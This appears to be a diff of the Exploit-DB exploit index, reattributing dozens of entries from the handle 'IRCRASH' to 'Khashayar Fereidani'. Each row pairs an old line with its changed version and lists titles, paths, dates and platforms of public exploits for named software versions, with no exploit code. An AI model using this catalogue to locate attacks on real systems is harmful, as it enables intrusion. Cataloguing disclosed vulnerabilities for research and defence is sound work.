6251,platforms/windows/dos/6251.txt,"ESET Smart Security 3.0.667.0 - Privilege Escalation PoC",2008-08-16,g_,windows,dos,0
6252,platforms/multiple/dos/6252.txt,"VLC 0.8.6i - .tta File Parsing Heap Overflow PoC",2008-08-16,g_,multiple,dos,0
6253,platforms/windows/dos/6253.txt,"EO Video 1.36 - Local Heap Overflow DoS / PoC",2008-08-16,j0rgan,windows,dos,0
@ -5951,7 +5951,7 @@ id,file,description,date,author,platform,type,port
6366,platforms/hardware/remote/6366.c,"MicroTik RouterOS <= 3.13 SNMP write (Set request) PoC",2008-09-05,ShadOS,hardware,remote,0
6367,platforms/windows/remote/6367.txt,"Google Chrome Browser 0.2.149.27 - (SaveAs) Remote BoF Exploit",2008-09-05,SVRT,windows,remote,0
6368,platforms/php/webapps/6368.php,"AWStats Totals (awstatstotals.php sort) Remote Code Execution Exploit",2008-09-05,"Ricardo Almeida",php,webapps,0
6369,platforms/php/webapps/6369.py,"devalcms 1.4a XSS / Remote Code Execution Exploit",2008-09-05,IRCRASH,php,webapps,0
6369,platforms/php/webapps/6369.py,"devalcms 1.4a XSS / Remote Code Execution Exploit",2008-09-05,"Khashayar Fereidani",php,webapps,0
6370,platforms/php/webapps/6370.pl,"WebCMS Portal Edition (index.php id) Blind SQL Injection Exploit",2008-09-05,JosS,php,webapps,0
6371,platforms/php/webapps/6371.txt,"Vastal I-Tech Agent Zone (ann_id) SQL Injection Vulnerability",2008-09-05,"DeViL iRaQ",php,webapps,0
6372,platforms/windows/dos/6372.html,"Google Chrome Browser 0.2.149.27 A HREF Denial of Service Exploit",2008-09-05,Shinnok,windows,dos,0
@ -5980,7 +5980,7 @@ id,file,description,date,author,platform,type,port
6397,platforms/php/webapps/6397.txt,"Wordpress 2.6.1 - SQL Column Truncation Vulnerability",2008-09-07,irk4z,php,webapps,0
6398,platforms/php/webapps/6398.txt,"E-Shop Shopping Cart Script (search_results.php) SQL Injection Vuln",2008-09-07,Mormoroth,php,webapps,0
6401,platforms/php/webapps/6401.txt,"Alstrasoft Forum (catid) Remote SQL Injection Vulnerability",2008-09-09,r45c4l,php,webapps,0
6402,platforms/php/webapps/6402.txt,"Stash 1.0.3 - Multiple SQL Injection Vulnerabilities",2008-09-09,IRCRASH,php,webapps,0
6402,platforms/php/webapps/6402.txt,"Stash 1.0.3 - Multiple SQL Injection Vulnerabilities",2008-09-09,"Khashayar Fereidani",php,webapps,0
6403,platforms/php/webapps/6403.txt,"Hot Links SQL-PHP 3 (report.php) Multiple Vulnerabilities",2008-09-09,sl4xUz,php,webapps,0
6404,platforms/php/webapps/6404.txt,"Live TV Script (index.php mid) SQL Injection Vulnerability",2008-09-09,InjEctOr5,php,webapps,0
6405,platforms/asp/webapps/6405.txt,"Creator CMS 5.0 (sideid) Remote SQL Injection Vulnerability",2008-09-09,"ThE X-HaCkEr",asp,webapps,0
@ -6001,13 +6001,13 @@ id,file,description,date,author,platform,type,port
6422,platforms/php/webapps/6422.txt,"phpvid 1.1 (xss/SQL) Multiple Vulnerabilities",2008-09-10,r45c4l,php,webapps,0
6423,platforms/php/webapps/6423.txt,"Zanfi CMS lite / Jaw Portal free (page) SQL Injection Vulnerability",2008-09-10,Cru3l.b0y,php,webapps,0
6424,platforms/windows/dos/6424.html,"Adobe Acrobat 9 - ActiveX Remote Denial of Service Exploit",2008-09-11,"Jeremy Brown",windows,dos,0
6425,platforms/php/webapps/6425.txt,"PhpWebGallery 1.3.4 (XSS/LFI) Multiple Vulnerabilities",2008-09-11,IRCRASH,php,webapps,0
6425,platforms/php/webapps/6425.txt,"PhpWebGallery 1.3.4 (XSS/LFI) Multiple Vulnerabilities",2008-09-11,"Khashayar Fereidani",php,webapps,0
6426,platforms/php/webapps/6426.txt,"Autodealers CMS AutOnline (pageid) SQL Injection Vulnerability",2008-09-11,r45c4l,php,webapps,0
6427,platforms/php/webapps/6427.txt,"Sports Clubs Web Panel 0.0.1 (p) Local File Inclusion Vulnerability",2008-09-11,StAkeR,php,webapps,0
6428,platforms/php/webapps/6428.pl,"Easy Photo Gallery 2.1 - XSS/FD/Bypass/SQL Injection Exploit",2008-09-11,IRCRASH,php,webapps,0
6428,platforms/php/webapps/6428.pl,"Easy Photo Gallery 2.1 - XSS/FD/Bypass/SQL Injection Exploit",2008-09-11,"Khashayar Fereidani",php,webapps,0
6430,platforms/php/webapps/6430.txt,"D-iscussion Board 3.01 (topic) Local File Inclusion Vulnerability",2008-09-11,SirGod,php,webapps,0
6431,platforms/php/webapps/6431.pl,"phsBlog 0.2 Bypass SQL Injection Filtering Exploit",2008-09-11,IRCRASH,php,webapps,0
6432,platforms/php/webapps/6432.py,"minb 0.1.0 - Remote Code Execution Exploit",2008-09-11,IRCRASH,php,webapps,0
6431,platforms/php/webapps/6431.pl,"phsBlog 0.2 Bypass SQL Injection Filtering Exploit",2008-09-11,"Khashayar Fereidani",php,webapps,0
6432,platforms/php/webapps/6432.py,"minb 0.1.0 - Remote Code Execution Exploit",2008-09-11,"Khashayar Fereidani",php,webapps,0
6433,platforms/php/webapps/6433.txt,"Autodealers CMS AutOnline (id) SQL Injection Vulnerability",2008-09-11,ZoRLu,php,webapps,0
6434,platforms/windows/dos/6434.html,"Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC",2008-09-11,LiquidWorm,windows,dos,0
6435,platforms/php/webapps/6435.txt,"Sports Clubs Web Panel 0.0.1 (id) SQL Injection Vulnerabilities",2008-09-11,"Virangar Security",php,webapps,0
@ -6460,7 +6460,7 @@ id,file,description,date,author,platform,type,port
6894,platforms/php/webapps/6894.txt,"SFS EZ Gaming Directory (directory.php id) SQL Injection Vulnerability",2008-10-31,Hurley,php,webapps,0
6895,platforms/php/webapps/6895.txt,"SFS EZ Adult Directory (directory.php id) SQL Injection Vulnerability",2008-10-31,Hurley,php,webapps,0
6896,platforms/php/webapps/6896.txt,"Logz podcast CMS 1.3.1 (add_url.php art) SQL Injection Vulnerability",2008-10-31,ZoRLu,php,webapps,0
6897,platforms/php/webapps/6897.txt,"cpanel 11.x - XSS / Local File Inclusion Vulnerability",2008-10-31,IRCRASH,php,webapps,0
6897,platforms/php/webapps/6897.txt,"cpanel 11.x - XSS / Local File Inclusion Vulnerability",2008-10-31,"Khashayar Fereidani",php,webapps,0
6898,platforms/php/webapps/6898.txt,"U-Mail Webmail 4.91 (edit.php) Arbitrary File Write Vulnerability",2008-10-31,"Shennan Wang",php,webapps,0
6899,platforms/hardware/remote/6899.txt,"A-Link WL54AP3 and WL54AP2 - CSRF+XSS Vulnerability",2008-10-31,"Henri Lindberg",hardware,remote,0
6900,platforms/php/webapps/6900.txt,"Absolute News Manager 5.1 Insecure Cookie Handling Vulnerability",2008-10-31,Hakxer,php,webapps,0
@ -6580,7 +6580,7 @@ id,file,description,date,author,platform,type,port
7016,platforms/php/webapps/7016.txt,"DevelopItEasy Photo Gallery 1.2 - SQL Injection Vulnerabilities",2008-11-06,InjEctOr5,php,webapps,0
7017,platforms/php/webapps/7017.txt,"Pre ADS Portal <= 2.0 (Auth Bypass/XSS) Multiple Vulnerabilities",2008-11-06,G4N0K,php,webapps,0
7018,platforms/php/webapps/7018.txt,"NICE FAQ Script (Auth Bypass) SQL Injection Vulnerability",2008-11-06,r45c4l,php,webapps,0
7019,platforms/php/webapps/7019.txt,"Arab Portal 2.1 - Remote File Disclosure Vulnerability (win only)",2008-11-06,IRCRASH,php,webapps,0
7019,platforms/php/webapps/7019.txt,"Arab Portal 2.1 - Remote File Disclosure Vulnerability (win only)",2008-11-06,"Khashayar Fereidani",php,webapps,0
7020,platforms/php/webapps/7020.txt,"MySQL Quick Admin 1.5.5 - Local File Inclusion Vulnerability",2008-11-06,"Vinod Sharma",php,webapps,0
7021,platforms/php/webapps/7021.txt,"SoftComplex PHP Image Gallery 1.0 (Auth Bypass) SQL Injection Vuln",2008-11-06,Cyber-Zone,php,webapps,0
7022,platforms/php/webapps/7022.txt,"LoveCMS 1.6.2 Final Arbitrary File Delete Vulnerability",2008-11-06,cOndemned,php,webapps,0
@ -6886,7 +6886,7 @@ id,file,description,date,author,platform,type,port
7340,platforms/asp/webapps/7340.txt,"Easy News Content Management (News.mdb) Database Disclosure Vuln",2008-12-04,BeyazKurt,asp,webapps,0
7341,platforms/php/webapps/7341.txt,"lcxbbportal 0.1 alpha 2 - Remote File Inclusion Vulnerability",2008-12-04,NoGe,php,webapps,0
7342,platforms/php/webapps/7342.txt,"My Simple Forum 3.0 (index.php action) Local File Inclusion Vulnerability",2008-12-04,cOndemned,php,webapps,0
7343,platforms/php/webapps/7343.txt,"Joomla Component mydyngallery 1.4.2 (directory) SQL Injection Vuln",2008-12-04,IRCRASH,php,webapps,0
7343,platforms/php/webapps/7343.txt,"Joomla Component mydyngallery 1.4.2 (directory) SQL Injection Vuln",2008-12-04,"Khashayar Fereidani",php,webapps,0
7344,platforms/php/webapps/7344.txt,"Gravity GTD <= 0.4.5 (rpc.php objectname) LFI/RCE Vulnerability",2008-12-04,dun,php,webapps,0
7345,platforms/php/webapps/7345.txt,"BNCwi <= 1.04 - Local File Inclusion Vulnerability",2008-12-04,dun,php,webapps,0
7346,platforms/php/webapps/7346.txt,"Multiple Membership Script 2.5 (id) SQL Injection Vulnerability",2008-12-05,ViRuS_HaCkErS,php,webapps,0
@ -6971,7 +6971,7 @@ id,file,description,date,author,platform,type,port
7426,platforms/php/webapps/7426.txt,"PHP Support Tickets 2.2 - Remote File Upload Vulnerability",2008-12-11,ahmadbady,php,webapps,0
7427,platforms/asp/webapps/7427.txt,"The Net Guys ASPired2Poll Remote Database Disclosure Vulnerability",2008-12-11,AlpHaNiX,asp,webapps,0
7428,platforms/asp/webapps/7428.txt,"The Net Guys ASPired2Protect Database Disclosure Vulnerability",2008-12-12,AlpHaNiX,asp,webapps,0
7429,platforms/asp/webapps/7429.txt,"ASP-CMS 1.0 (index.asp cha) SQL Injection Vulnerability",2008-12-12,IRCRASH,asp,webapps,0
7429,platforms/asp/webapps/7429.txt,"ASP-CMS 1.0 (index.asp cha) SQL Injection Vulnerability",2008-12-12,"Khashayar Fereidani",asp,webapps,0
7430,platforms/php/webapps/7430.txt,"SUMON <= 0.7.0 (chg.php host) Command Execution Vulnerability",2008-12-12,dun,php,webapps,0
7431,platforms/windows/dos/7431.pl,"Microsoft Visual Basic ActiveX Controls mscomct2.ocx Buffer Overflow PoC",2008-12-12,"Jerome Athias",windows,dos,0
7432,platforms/php/webapps/7432.txt,"Xpoze 4.10 (home.html menu) Blind SQL Injection Vulnerability",2008-12-12,XaDoS,php,webapps,0
@ -7136,7 +7136,7 @@ id,file,description,date,author,platform,type,port
7595,platforms/php/webapps/7595.txt,"FubarForum 1.6 - Arbitrary Admin Bypass Vulnerability",2008-12-28,k3yv4n,php,webapps,0
7596,platforms/php/webapps/7596.txt,"AlstraSoft Web Email Script Enterprise (id) SQL Injection Vuln",2008-12-28,Bgh7,php,webapps,0
7597,platforms/php/webapps/7597.txt,"OwenPoll 1.0 Insecure Cookie Handling Vulnerability",2008-12-28,Osirys,php,webapps,0
7598,platforms/php/webapps/7598.txt,"PHP-Fusion Mod TI (id) Remote SQL Injection Vulnerability",2008-12-28,IRCRASH,php,webapps,0
7598,platforms/php/webapps/7598.txt,"PHP-Fusion Mod TI (id) Remote SQL Injection Vulnerability",2008-12-28,"Khashayar Fereidani",php,webapps,0
7599,platforms/asp/webapps/7599.txt,"ForumApp 3.3 - Remote Database Disclosure Vulnerability",2008-12-28,Cyber.Zer0,asp,webapps,0
7600,platforms/php/webapps/7600.pl,"Flexphplink Pro Arbitrary File Upload Exploit",2008-12-28,Osirys,php,webapps,0
7601,platforms/php/webapps/7601.txt,"Silentum LoginSys 1.0.0 Insecure Cookie Handling Vulnerability",2008-12-28,Osirys,php,webapps,0
@ -7235,13 +7235,13 @@ id,file,description,date,author,platform,type,port
7694,platforms/windows/dos/7694.py,"Audacity 1.6.2 - (.aup) Remote off by one Crash Exploit",2009-01-07,Stack,windows,dos,0
7695,platforms/windows/local/7695.pl,"VUPlayer <= 2.49 - (.PLS) Universal Buffer Overflow Exploit",2009-01-07,SkD,windows,local,0
7696,platforms/windows/dos/7696.pl,"WinAmp GEN_MSN Plugin - Heap Buffer Overflow PoC",2009-01-07,SkD,windows,dos,0
7697,platforms/php/webapps/7697.txt,"PHP-Fusion Mod Members CV (job) 1.0 - SQL Injection Vulnerability",2009-01-07,IRCRASH,php,webapps,0
7698,platforms/php/webapps/7698.txt,"PHP-Fusion Mod E-Cart 1.3 (items.php CA) SQL Injection Vulnerability",2009-01-07,IRCRASH,php,webapps,0
7697,platforms/php/webapps/7697.txt,"PHP-Fusion Mod Members CV (job) 1.0 - SQL Injection Vulnerability",2009-01-07,"Khashayar Fereidani",php,webapps,0
7698,platforms/php/webapps/7698.txt,"PHP-Fusion Mod E-Cart 1.3 (items.php CA) SQL Injection Vulnerability",2009-01-07,"Khashayar Fereidani",php,webapps,0
7699,platforms/php/webapps/7699.txt,"QuoteBook (poll.inc) Remote Config File Disclosure Vulnerability",2009-01-07,Moudi,php,webapps,0
7700,platforms/php/webapps/7700.php,"CuteNews <= 1.4.6 (ip ban) XSS/Command Execution Exploit (adm req.)",2009-01-08,StAkeR,php,webapps,0
7701,platforms/linux/remote/7701.txt,"Samba < 3.0.20 - Remote Heap Overflow Exploit",2009-01-08,zuc,linux,remote,445
7702,platforms/windows/local/7702.c,"GOM Player 2.0.12.3375 - (.ASX) Stack Overflow Exploit",2009-01-08,DATA_SNIPER,windows,local,0
7703,platforms/php/webapps/7703.txt,"PHP-Fusion Mod vArcade 1.8 (comment_id) SQL Injection Vulnerability",2009-01-08,IRCRASH,php,webapps,0
7703,platforms/php/webapps/7703.txt,"PHP-Fusion Mod vArcade 1.8 (comment_id) SQL Injection Vulnerability",2009-01-08,"Khashayar Fereidani",php,webapps,0
7704,platforms/php/webapps/7704.pl,"Pizzis CMS <= 1.5.1 (visualizza.php idvar) Blind SQL Injection Exploit",2009-01-08,darkjoker,php,webapps,0
7705,platforms/php/webapps/7705.pl,"XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit",2009-01-08,StAkeR,php,webapps,0
7706,platforms/windows/remote/7706.mrc,"Anope IRC Services With bs_fantasy_ext <= 1.2.0-RC1 mIRC script",2009-01-08,Phil,windows,remote,0
@ -7386,7 +7386,7 @@ id,file,description,date,author,platform,type,port
7847,platforms/php/webapps/7847.txt,"Joomla Component beamospetition 1.0.12 SQL Injection / XSS",2009-01-21,vds_s,php,webapps,0
7848,platforms/windows/local/7848.pl,"Browser3D 3.5 - (.sfs) Local Stack Overflow Exploit",2009-01-22,AlpHaNiX,windows,local,0
7849,platforms/php/webapps/7849.txt,"OwnRS Blog 1.2 (autor.php) SQL Injection Vulnerability",2009-01-22,nuclear,php,webapps,0
7850,platforms/asp/webapps/7850.txt,"asp-project 1.0 Insecure Cookie Method Vulnerability",2009-01-22,IRCRASH,asp,webapps,0
7850,platforms/asp/webapps/7850.txt,"asp-project 1.0 Insecure Cookie Method Vulnerability",2009-01-22,"Khashayar Fereidani",asp,webapps,0
7851,platforms/php/webapps/7851.php,"Pardal CMS <= 0.2.0 - Blind SQL Injection Exploit",2009-01-22,darkjoker,php,webapps,0
7852,platforms/windows/dos/7852.pl,"FTPShell Server 4.3 (licence key) Remote Buffer Overflow PoC",2009-01-22,LiquidWorm,windows,dos,0
7853,platforms/windows/local/7853.pl,"EleCard MPEG PLAYER - (.m3u) Local Stack Overflow Exploit",2009-01-25,AlpHaNiX,windows,local,0
@ -8590,7 +8590,7 @@ id,file,description,date,author,platform,type,port
9104,platforms/windows/local/9104.py,"Photo DVD Maker Pro <= 8.02 - (.pdm) Local BoF Exploit (SEH)",2009-07-10,His0k4,windows,local,0
9105,platforms/php/webapps/9105.txt,"MyMsg 1.0.3 (uid) Remote SQL Injection Vulnerability",2009-07-10,Monster-Dz,php,webapps,0
9106,platforms/windows/remote/9106.txt,"citrix xencenterweb - (xss/sql/rce) Multiple Vulnerabilities",2009-07-10,"Secure Network",windows,remote,0
9107,platforms/php/webapps/9107.txt,"Phenotype CMS 2.8 (login.php user) Blind SQL Injection Vulnerability",2009-07-10,IRCRASH,php,webapps,0
9107,platforms/php/webapps/9107.txt,"Phenotype CMS 2.8 (login.php user) Blind SQL Injection Vulnerability",2009-07-10,"Khashayar Fereidani",php,webapps,0
9108,platforms/windows/remote/9108.py,"Microsoft Internet Explorer 7 Video ActiveX Remote Buffer Overflow Exploit",2009-07-10,"David Kennedy (ReL1K)",windows,remote,0
9109,platforms/php/webapps/9109.txt,"ToyLog 0.1 - SQL Injection Vulnerability/RCE Exploit",2009-07-10,darkjoker,php,webapps,0
9110,platforms/php/webapps/9110.txt,"WordPress - Privileges Unchecked in admin.php and Multiple Information",2009-07-10,"Core Security",php,webapps,0
@ -8612,7 +8612,7 @@ id,file,description,date,author,platform,type,port
9127,platforms/php/webapps/9127.txt,"d.net CMS Arbitrary Reinstall/Blind SQL Injection Exploit",2009-07-11,darkjoker,php,webapps,0
9128,platforms/windows/remote/9128.py,"Pirch IRC 98 Client - (response) Remote BoF Exploit (SEH)",2009-07-12,His0k4,windows,remote,0
9129,platforms/php/webapps/9129.txt,"censura 1.16.04 (bsql/XSS) Multiple Vulnerabilities",2009-07-12,Vrs-hCk,php,webapps,0
9130,platforms/php/webapps/9130.txt,"Php AdminPanel Free 1.0.5 - Remote File Disclosure Vuln",2009-07-12,IRCRASH,php,webapps,0
9130,platforms/php/webapps/9130.txt,"Php AdminPanel Free 1.0.5 - Remote File Disclosure Vuln",2009-07-12,"Khashayar Fereidani",php,webapps,0
9131,platforms/windows/dos/9131.py,"Tandberg MXP F7.0 (USER) Remote Buffer Overflow PoC",2009-07-13,otokoyama,windows,dos,0
9132,platforms/php/webapps/9132.py,"RunCMS <= 1.6.3 (double ext) Remote Shell Injection Exploit",2009-07-13,StAkeR,php,webapps,0
9133,platforms/windows/dos/9133.pl,"ScITE Editor 1.72 - Local Crash Vulnerability Exploit",2009-07-13,prodigy,windows,dos,0
@ -8637,8 +8637,8 @@ id,file,description,date,author,platform,type,port
9152,platforms/windows/local/9152.pl,"AudioPLUS 2.00.215 - (.m3u .lst) Universal SEH Overwrite Exploit",2009-07-15,Stack,windows,local,0
9153,platforms/php/webapps/9153.txt,"Admin News Tools 2.5 (fichier) Remote File Disclosure Vulnerability",2009-07-15,Securitylab.ir,php,webapps,0
9154,platforms/php/webapps/9154.js,"ZenPhoto 1.2.5 Completely Blind SQL Injection Exploit",2009-07-15,petros,php,webapps,0
9155,platforms/php/webapps/9155.txt,"PHPGenealogy 2.0 (DataDirectory) RFI Vulnerability",2009-07-15,IRCRASH,php,webapps,0
9156,platforms/php/webapps/9156.py,"Greenwood Content Manager 0.3.2 - Local File Inclusion Exploit",2009-07-15,IRCRASH,php,webapps,0
9155,platforms/php/webapps/9155.txt,"PHPGenealogy 2.0 (DataDirectory) RFI Vulnerability",2009-07-15,"Khashayar Fereidani",php,webapps,0
9156,platforms/php/webapps/9156.py,"Greenwood Content Manager 0.3.2 - Local File Inclusion Exploit",2009-07-15,"Khashayar Fereidani",php,webapps,0
9157,platforms/windows/dos/9157.pl,"Hamster Audio Player 0.3a - Local Buffer Overflow PoC",2009-07-15,"ThE g0bL!N",windows,dos,0
9158,platforms/windows/dos/9158.html,"Mozilla Firefox 3.5 unicode Remote Buffer Overflow PoC",2009-07-15,"Andrew Haynes",windows,dos,0
9159,platforms/php/webapps/9159.php,"Infinity <= 2.0.5 - Arbitrary Create Admin Exploit",2009-07-15,Qabandi,php,webapps,0
@ -8903,14 +8903,14 @@ id,file,description,date,author,platform,type,port
9434,platforms/php/webapps/9434.txt,"tgs CMS 0.x (xss/sql/fd) Multiple Vulnerabilities",2009-08-13,[]ViZiOn,php,webapps,0
9435,platforms/linux/local/9435.txt,"Linux Kernel 2.x - sock_sendpage() Local Ring0 Root Exploit (1)",2009-08-14,spender,linux,local,0
9436,platforms/linux/local/9436.txt,"Linux Kernel 2.x - sock_sendpage() Local Root Exploit (2)",2009-08-14,"Przemyslaw Frasunek",linux,local,0
9437,platforms/php/webapps/9437.txt,"Ignition 1.2 (comment) Remote Code Injection Vulnerability",2009-08-14,IRCRASH,php,webapps,0
9437,platforms/php/webapps/9437.txt,"Ignition 1.2 (comment) Remote Code Injection Vulnerability",2009-08-14,"Khashayar Fereidani",php,webapps,0
9438,platforms/php/webapps/9438.txt,"PHP Competition System <= 0.84 (competition) SQL Injection Vuln",2009-08-14,Mr.SQL,php,webapps,0
9440,platforms/php/webapps/9440.txt,"DS CMS 1.0 (nFileId) Remote SQL Injection Vulnerability",2009-08-14,Mr.tro0oqy,php,webapps,0
9441,platforms/php/webapps/9441.txt,"MyWeight 1.0 - Remote Shell Upload Vulnerability",2009-08-14,Mr.tro0oqy,php,webapps,0
9442,platforms/linux/dos/9442.c,"Linux Kernel < 2.6.30.5 cfg80211 - Remote Denial of Service Exploit",2009-08-18,"Jon Oberheide",linux,dos,0
9443,platforms/windows/remote/9443.txt,"Adobe JRun 4 (logfile) Directory Traversal Vulnerability (auth)",2009-08-18,DSecRG,windows,remote,0
9444,platforms/php/webapps/9444.txt,"PHP-Lance 1.52 - Multiple Local File Inclusion Vulnerabilities",2009-08-18,jetli007,php,webapps,0
9445,platforms/php/webapps/9445.py,"BaBB 2.8 - Remote Code Injection Exploit",2009-08-18,IRCRASH,php,webapps,0
9445,platforms/php/webapps/9445.py,"BaBB 2.8 - Remote Code Injection Exploit",2009-08-18,"Khashayar Fereidani",php,webapps,0
9446,platforms/windows/dos/9446.cpp,"HTML Email Creator & Sender 2.3 - Local Buffer Overflow PoC (SEH)",2009-08-18,"fl0 fl0w",windows,dos,0
9447,platforms/php/webapps/9447.pl,"AJ Auction Pro OOPD 2.x - (store.php id) SQL Injection Exploit",2009-08-18,NoGe,php,webapps,0
9448,platforms/php/webapps/9448.py,"SPIP < 2.0.9 - Arbitrary Copy All Passwords to XML File Remote Exploit",2009-08-18,Kernel_Panik,php,webapps,0
@ -8955,7 +8955,7 @@ id,file,description,date,author,platform,type,port
9487,platforms/windows/dos/9487.pl,"Faslo Player 7.0 - (.m3u) Local Buffer Overflow PoC",2009-08-24,hack4love,windows,dos,0
9488,platforms/freebsd/local/9488.c,"FreeBSD <= 6.1 - kqueue() NULL pointer Dereference Local Root Exploit",2009-08-24,"Przemyslaw Frasunek",freebsd,local,0
9489,platforms/multiple/local/9489.txt,"Multiple BSD Operating Systems setusercontext() Vulnerabilities",2009-08-24,kingcope,multiple,local,0
9490,platforms/php/webapps/9490.txt,"Lanai Core 0.6 - Remote File Disclosure / Info Disclosure Vulns",2009-08-24,IRCRASH,php,webapps,0
9490,platforms/php/webapps/9490.txt,"Lanai Core 0.6 - Remote File Disclosure / Info Disclosure Vulns",2009-08-24,"Khashayar Fereidani",php,webapps,0
9491,platforms/php/webapps/9491.txt,"Dow Group (new.php) SQL Injection",2009-11-16,ProF.Code,php,webapps,0
9492,platforms/windows/local/9492.c,"Avast! 4.8.1335 Professional Local Kernel Buffer Overflow Exploit",2009-08-24,Heurs,windows,local,0
9493,platforms/php/webapps/9493.txt,"Uebimiau Webmail 3.2.0-2.0 - Arbitrary Database Disclosure Vuln",2009-08-24,Septemb0x,php,webapps,0
@ -14048,21 +14048,21 @@ id,file,description,date,author,platform,type,port
16235,platforms/php/webapps/16235.txt,"Wordpress Plugin Forum Server 1.6.5 - SQL Injection Vulnerability",2011-02-24,"High-Tech Bridge SA",php,webapps,0
16236,platforms/php/webapps/16236.txt,"IWantOneButton 3.0.1 Wordpress Plugin - Multiple Vulnerabilities",2011-02-24,"High-Tech Bridge SA",php,webapps,0
16237,platforms/windows/dos/16237.py,"Elecard MPEG Player 5.7 - Local Buffer Overflow PoC (SEH)",2011-02-24,badc0re,windows,dos,0
16238,platforms/hardware/remote/16238.txt,"iphone ishred 1.93 - Directory Traversal",2011-02-24,IRCRASH,hardware,remote,0
16239,platforms/hardware/remote/16239.txt,"iPhone Guitar Directory Traversal",2011-02-24,IRCRASH,hardware,remote,0
16240,platforms/hardware/remote/16240.txt,"iphone pdf reader pro 2.3 - Directory Traversal",2011-02-24,IRCRASH,hardware,remote,0
16238,platforms/hardware/remote/16238.txt,"iphone ishred 1.93 - Directory Traversal",2011-02-24,"Khashayar Fereidani",hardware,remote,0
16239,platforms/hardware/remote/16239.txt,"iPhone Guitar Directory Traversal",2011-02-24,"Khashayar Fereidani",hardware,remote,0
16240,platforms/hardware/remote/16240.txt,"iphone pdf reader pro 2.3 - Directory Traversal",2011-02-24,"Khashayar Fereidani",hardware,remote,0
16241,platforms/asp/webapps/16241.txt,"RaksoCT Multiple SQL Injection Vulnerabilities",2011-02-25,p0pc0rn,asp,webapps,0
16242,platforms/windows/remote/16242.html,"Edraw Office Viewer Component 7.4 - ActiveX Stack Buffer Overflow",2011-02-25,"Alexander Gavrun",windows,remote,0
16243,platforms/hardware/remote/16243.py,"iphone folders 2.5 - Directory Traversal",2011-02-25,IRCRASH,hardware,remote,0
16244,platforms/hardware/remote/16244.py,"iphone ifile 2.0 - Directory Traversal",2011-02-25,IRCRASH,hardware,remote,0
16245,platforms/hardware/remote/16245.py,"iphone mydocs 2.7 - Directory Traversal",2011-02-25,IRCRASH,hardware,remote,0
16243,platforms/hardware/remote/16243.py,"iphone folders 2.5 - Directory Traversal",2011-02-25,"Khashayar Fereidani",hardware,remote,0
16244,platforms/hardware/remote/16244.py,"iphone ifile 2.0 - Directory Traversal",2011-02-25,"Khashayar Fereidani",hardware,remote,0
16245,platforms/hardware/remote/16245.py,"iphone mydocs 2.7 - Directory Traversal",2011-02-25,"Khashayar Fereidani",hardware,remote,0
16246,platforms/php/webapps/16246.py,"Joomla XCloner Component (com_xcloner-backupandrestore) Remote Command Execution",2011-02-25,mr_me,php,webapps,0
16247,platforms/php/webapps/16247.txt,"Pragyan CMS 3.0 - Multiple Vulnerabilities",2011-02-25,"Villy and Abhishek Lyall",php,webapps,0
16248,platforms/windows/dos/16248.pl,"eXPert PDF Reader 4.0 NULL Pointer Dereference and Heap Corruption",2011-02-26,LiquidWorm,windows,dos,0
16249,platforms/php/webapps/16249.txt,"phreebooks r30rc4 - Multiple Vulnerabilities",2011-02-26,"AutoSec Tools",php,webapps,0
16250,platforms/php/webapps/16250.txt,"jQuery Mega Menu 1.0 Wordpress Plugin - Local File Inclusion",2011-02-26,"AutoSec Tools",php,webapps,0
16251,platforms/php/webapps/16251.txt,"OPS Old Post Spinner 2.2.1 Wordpress Plugin - LFI Vulnerability",2011-02-26,"AutoSec Tools",php,webapps,0
16252,platforms/hardware/webapps/16252.html,"Linksys Cisco WAG120N CSRF Vulnerability",2011-02-26,IRCRASH,hardware,webapps,0
16252,platforms/hardware/webapps/16252.html,"Linksys Cisco WAG120N CSRF Vulnerability",2011-02-26,"Khashayar Fereidani",hardware,webapps,0
16255,platforms/windows/dos/16255.pl,"Magic Music Editor - (.cda) Denial of Service",2011-02-28,"AtT4CKxT3rR0r1ST ",windows,dos,0
16256,platforms/php/webapps/16256.txt,"DO-CMS - Multiple SQL Injection Vulnerabilities",2011-02-28,"AtT4CKxT3rR0r1ST ",php,webapps,0
16257,platforms/php/webapps/16257.txt,"SnapProof (page.php) SQL Injection Vulnerability",2011-02-28,"AtT4CKxT3rR0r1ST ",php,webapps,0
@ -14731,7 +14731,7 @@ id,file,description,date,author,platform,type,port
16929,platforms/aix/dos/16929.rb,"AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 - Buffer Overflow",2010-11-11,metasploit,aix,dos,0
16930,platforms/aix/remote/16930.rb,"ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)",2010-11-11,metasploit,aix,remote,0
16931,platforms/php/webapps/16931.html,"N-13 News 4.0 - CSRF Vulnerability (Add Admin)",2011-03-06,"AtT4CKxT3rR0r1ST ",php,webapps,0
16946,platforms/php/webapps/16946.txt,"RuubikCMS 1.0.3 - Multiple Vulnerabilities",2011-03-08,IRCRASH,php,webapps,0
16946,platforms/php/webapps/16946.txt,"RuubikCMS 1.0.3 - Multiple Vulnerabilities",2011-03-08,"Khashayar Fereidani",php,webapps,0
16933,platforms/php/webapps/16933.txt,"Quick Polls Local File Inclusion and Deletion Vulnerabilities",2011-03-06,"Mark Stanislav",php,webapps,0
16934,platforms/php/webapps/16934.pl,"EggAvatar for vBulletin 3.8.x SQL Injection Vulnerability",2011-03-06,DSecurity,php,webapps,0
16935,platforms/php/webapps/16935.txt,"bacula-web 1.3.x - 5.0.3 - Multiple Vulnerabilities",2011-03-07,b0telh0,php,webapps,0
@ -14748,7 +14748,7 @@ id,file,description,date,author,platform,type,port
16947,platforms/php/webapps/16947.txt,"GRAND Flash Album Gallery 0.55 Wordpress Plugin - Multiple Vulnerabilities",2011-03-08,"High-Tech Bridge SA",php,webapps,0
16948,platforms/php/webapps/16948.txt,"Esselbach Storyteller CMS System 1.8 - SQL Injection Vulnerability",2011-03-09,Shamus,php,webapps,0
16949,platforms/php/webapps/16949.php,"maian weblog <= 4.0 - Remote Blind SQL Injection",2011-03-09,mr_me,php,webapps,0
16950,platforms/php/webapps/16950.txt,"recordpress 0.3.1 - Multiple Vulnerabilities",2011-03-09,IRCRASH,php,webapps,0
16950,platforms/php/webapps/16950.txt,"recordpress 0.3.1 - Multiple Vulnerabilities",2011-03-09,"Khashayar Fereidani",php,webapps,0
16951,platforms/bsd/local/16951.c,"FreeBSD <= 6.4 - Netgraph Local Privledge Escalation Exploit",2011-03-10,zx2c4,bsd,local,0
